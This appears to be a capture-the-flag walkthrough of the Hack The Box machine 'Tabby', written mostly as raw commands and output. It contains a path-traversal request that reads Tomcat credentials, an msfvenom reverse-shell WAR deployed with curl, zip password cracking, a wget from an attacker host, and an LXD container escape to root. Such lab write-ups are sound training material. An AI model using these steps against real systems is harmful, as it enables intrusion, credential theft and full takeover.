$ nmap -sC -sV -A -Pn -oN tabby.nmap tabby.htb
$ nmap -p- --max-retries 5 --min-rate 5000 -oN tabby.all_ports tabby.htb

> enum on port 80 found new domain http://megahosting.htb
> add megahosting.htb to /etc/hosts
> found LFI vulnerability on http://http://megahosting.htb/news.php?file=
> searching for tomcat local file to get user:password
>  REFRENCE :
https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
https://mkyong.com/tomcat/tomcat-default-administrator-password/#:~:text=1.,access%20the%20Tomcat%20manager%20page. 

----------------------------------------------------------------------------------------------
GET /news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
Host: megahosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
----------------------------------------------------------------------------------------------

> cred for tomcat tomcat:$3cureP4s5w0rd123!
> Base on those articles we can ez make RCE 
	-> https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
	-> https://stackoverflow.com/questions/25029707/how-to-deploy-war-file-to-tomcat-using-command-prompt

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war
$ curl -v -u 'tomcat:$3cureP4s5w0rd123!' -T shell.war 'http://tabby.htb:8080/manager/text/deploy?path=/shell&update=true'

> After some enum steps ,i found /var/www/html/files/16162020_backup.zip
> Cracking with fcrackzip

$ fcrackzip -D -p /usr/share/dict/rockyou.txt 16162020_backup.zip 
possible pw found: admin@it ()

> Nothing inside that
> NVM,just try su ash with password was cracked and so on,we can get user.txt
> Seem like lxc binary looks suspicious 
> Base on these source
	-> https://www.hackingarticles.in/lxd-privilege-escalation/
	-> https://book.hacktricks.xyz/linux-unix/privilege-escalation/lxd-privilege-escalation 

> building alpine image and put into the box

ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    <14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    --2020-06-21 17:20:54--  http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    Connecting to 10.10.14.12:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3212312 (3.1M) [application/gzip]
    Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’

    alpine-v3.12-x86_64 100%[===================>]   3.06M  67.4KB/s    in 45s     

    2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]

    ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
    <ne-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
    If this is your first time running LXD on this machine, you should also run: lxd init
    To start your first instance, try: lxc launch ubuntu:18.04

    ash@tabby:~$ lxc image list
    lxc image list
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | liquid | 1145f55bb6a7 | no     | alpine v3.12 (20200621_22:04) | x86_64       | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

  ash@tabby:~$ lxd init
    Would you like to use LXD clustering? (yes/no) [default=no]: no
    Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
    Name of the new storage pool [default=default]: 
    Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
    Would you like to connect to a MAAS server? (yes/no) [default=no]: no
    Would you like to create a new local network bridge? (yes/no) [default=yes]: 
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: liquid
    What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    Would you like LXD to be available over the network? (yes/no) [default=no]: 
    Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
    Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
Creating privesc
ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to privesc
ash@tabby:~$ ^C
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # wc -c root.txt
33 root.txt
